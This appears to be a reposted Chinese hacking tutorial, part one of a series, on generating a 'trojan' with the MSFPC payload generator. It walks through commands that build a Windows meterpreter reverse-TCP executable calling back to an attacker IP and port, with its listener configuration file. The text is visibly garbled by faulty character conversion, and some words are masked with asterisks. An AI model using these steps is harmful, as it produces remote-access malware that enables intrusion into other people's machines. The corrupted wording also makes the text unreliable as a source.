白帽子***與網絡安全工程師教你：如何使用MSFPC半自動化生成強大的木碼？【上集】

課前聲明：
一、本分享僅作學習交流，請自覺遵照法律法規！
二、搜索：Kali 與編程，學習更多網絡***乾貨！
三、Kali 與編程天天準時更新，敬請學習和關注！

正文部分
1、背景介紹
通常來講，生成payload的默認工具是MSFvenom，這是一個獨立於Metasploit的payload生成器及編碼器。雖然它是一個很是強大的payload生成神器，可是對於一些新手來講，可能難以在短期內熟悉其操做。即便在進行最初的瞭解以後，生成一個基本的payload也須要輸入至關多的內容，而今天，咱們將看到使用MSFPC更便捷地生成paylaod。
MSFPC，或者說是MSFvenom Payload生成器，實際上是一個基於MSFvenom的Payload生成器，可是它旨在簡化基本的有效載荷建立過程，用戶使用MSFPC能夠儘量簡單地建立Payload，有時甚至只須要一個參數！若是你之前使用過MSFvenom，那麼可能已經自行編寫了一個簡單的shell腳原本自動化頻繁地生成Payload。即便這樣，這個工具也絕對值得一試。

2、資源裝備
1.安裝好 Kali Linux 的虛擬機一臺；
2.kali linux 受害者虛擬機一個；
3.整裝待發的小白一個。

3、戰略安排
3.1 經過Nmap腳本掃描WEB服務器或我的計算機是否被植入***
命令：nmap --script=http-malware-host IP
命令：nmap --script=http-malware-host 192.168.0.103

3.2 nmap掃描結果以下圖所示。
Host appears to be clean表示掃描的主機沒有被植入***。

3.3 普通的常常使用的Payload生成器簡單介紹，以下圖所示。
命令：msfvenom


3.4 利用命令行查看msfpc payload生成器生成的payload類別。
命令：msfpc
命令：msfpc --help



3.5 查看即將充當監聽主機的主機IP地址，以下圖所示。
命令：ifconfig

3.6 利用msfpc開始監聽端口而且生成相應的payload，以下圖所示。
命令：msfpc windows IP port
命令：msfpc windows 192.168.0.104 555


3.7 查看msfpc工具生成的payload信息，以下圖所示。
命令：ls
文件： windows-meterpreter-staged-reverse-tcp-555.exe
文件： windows-meterpreter-staged-reverse-tcp-555.exe.rc(payload配置信息)

3.8 查看「windows-meterpreter-staged-reverse-tcp-555.exe.rc」的文件內容，以下圖所示。

辛苦原創，你的每一次評論點贊和關注，都是咱們源源不斷的創做動力哦！你也可搜索:Kali 與編程，學習更多 Kali Linux ***與白帽編程技巧呢！
點我學習更多Kali Linux***測試與網絡***實戰技巧！請添加連接描述